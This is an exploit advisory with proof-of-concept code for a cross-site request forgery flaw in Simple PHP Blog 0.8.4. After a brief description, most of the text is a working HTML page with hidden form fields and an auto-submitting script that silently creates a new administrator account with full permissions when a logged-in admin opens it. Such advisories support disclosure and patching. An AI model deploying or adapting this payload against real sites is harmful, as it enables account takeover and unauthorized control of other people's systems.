<!--=========================================================================================================
Simple PHP Blog 0.8.4- Cross-Site Request Forgery (Add Admin)=========================================================================================================# Exploit Title: Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add
Admin)# Author: Besim# Google Dork: -# Date: 07/10/2016# Type: webapps# Platform : PHP# Vendor Homepage: http://simpleblogphp.com/# Software Link: https://sourceforge.net/projects/sphpblog/# Version: 0.8.4# Tested on: Ubuntu 14.04.5
Simple PHP Blog 0.8.4 versions is vulnerable to CSRF attack (No CSRF token
in place)
meaning that if an admin user can be tricked to visit a crafted URL created
by
attacker (via spear phishing/social engineering), a form will be submitted
to (*http://localhost/simple/manage_users.php?action=update&type=new
<http://localhost/simple/manage_users.php?action=update&type=new>*) that
will add a new user as administrator.
Once exploited, the attacker can login to the admin panel
(*http://localhost/simple/login.php <http://localhost/simple/login.php>*)
using the username and the password he posted in the form.*CSRF PoC Code*=============--><html><body><form action="
http://localhost/simple/manage_users.php?action=update&type=new"
method="POST"><inputtype="hidden" name="sUsername" value="Besim"/><inputtype="hidden" name="sFullname" value="Besim"/><inputtype="hidden" name="sPassword" value="mehmet"/><inputtype="hidden" name="sEmail" value="mehmet@yopmail.com"/><inputtype="hidden" name="sAvatar" value=""/><inputtype="hidden" name="sActive" value="on"/><inputtype="hidden" name="sModComments" value="on"/><inputtype="hidden" name="sDeleteEntries" value="on"/><inputtype="hidden" name="sEditAny" value="on"/><inputtype="hidden" name="submit" value="Create User"/><inputtype="submit" value="Submit request"/></form><script>
document.forms[0].submit();</script></body></html>--
Besim ALTiNOK
